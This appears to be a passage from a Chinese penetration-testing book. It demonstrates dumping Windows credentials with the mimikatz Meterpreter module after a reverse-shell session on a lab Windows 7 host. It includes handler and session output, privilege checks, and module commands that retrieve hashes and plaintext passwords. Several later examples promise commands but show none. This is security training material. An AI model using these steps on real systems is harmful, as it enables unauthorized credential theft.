mimikatz是一款強大的系統密碼破解獲取工具。該工具有段時間是作為一個獨立程序運行。現在已被添加到Metasploit框架中,並作為一個可加載的Meterpreter模塊。當成功的獲取到一個遠程會話時,使用mimikatz工具可以很快的恢復密碼。本節將介紹使用mimikatz工具恢復密碼。
【實例8-3】演示使用mimikatz恢復純文本密碼。具體操作步驟如下所示。
(1)通過在目標主機(Windows 7)上運行Veil創建的可執行文件backup.exe,獲取一個遠程會話。如下所示:
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] Starting the payload handler…
[*] Sending stage (769536 bytes) to 192.168.6.110
[*] Meterpreter session 2 opened (192.168.6.103:4444 -> 192.168.6.110:1523) at 2014-07-19 16:54:18 +0800
meterpreter >
從輸出的信息中,可以看到獲取到了一個與192.168.6.110主機的遠程會話。
(2)確認目標用戶的權限。執行命令如下所示:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
從輸出信息中,可以看到當前用戶已經是系統權限。此時,就可以進行其他操作了。
(3)加載mimikatz模塊。執行命令如下所示:
meterpreter > load mimikatz
Loading extension mimikatz…success.
從輸出的信息中,可以看到mimikatz模塊已加載成功。
(4)查看mimikatz模塊下有效的命令。執行命令如下所示:
meterpreter > help
執行以上命令后,會輸出大量的信息。其中,在Meterpreter中所有的命令都已分類。這里主要介紹下mimikatz相關的命令,如下所示:
Mimikatz Commands
=================
Command Description
------- -----------
kerberos Attempt to retrieve kerberos creds
livessp Attempt to retrieve livessp creds
mimikatz_command Run a custom commannd
msv Attempt to retrieve msv creds (hashes)
ssp Attempt to retrieve ssp creds
tspkg Attempt to retrieve tspkg creds
wdigest Attempt to retrieve wdigest creds
以上輸出信息顯示了可執行的Mimikatz命令。如回復kerberos信息、livessp信息和哈希信息等。
【實例8-4】恢復哈希密碼。執行命令如下所示:
執行以上命令后,輸出五列信息。分別表示認證ID、包、域名、用戶名和密碼。從該界面可以看到,當前系統中bob用戶的哈希密碼值中。在哈希密碼值中,前面的lm表示使用LM方式加密;ntlm表示使用NTLM方式加密。
【實例8-5】獲取kerberos(網絡認證協議)信息。執行命令如下所示:
從輸出的信息中可以看到,輸出的信息類似msv命令輸出的信息。唯一不同的就是,這里可以看到使用哈希加密的原始密碼。從以上信息中,可以看到bob用戶的密碼為www.123。
【實例8-6】獲取wdigest(摘要式身份驗證)信息,如下所示:
以上輸出的信息就是當前用戶摘要式身份驗證的信息。
【實例8-7】恢復livessp身份驗證信息。執行命令如下所示:
以上輸出的信息顯示了當前用戶livessp身份驗證信息。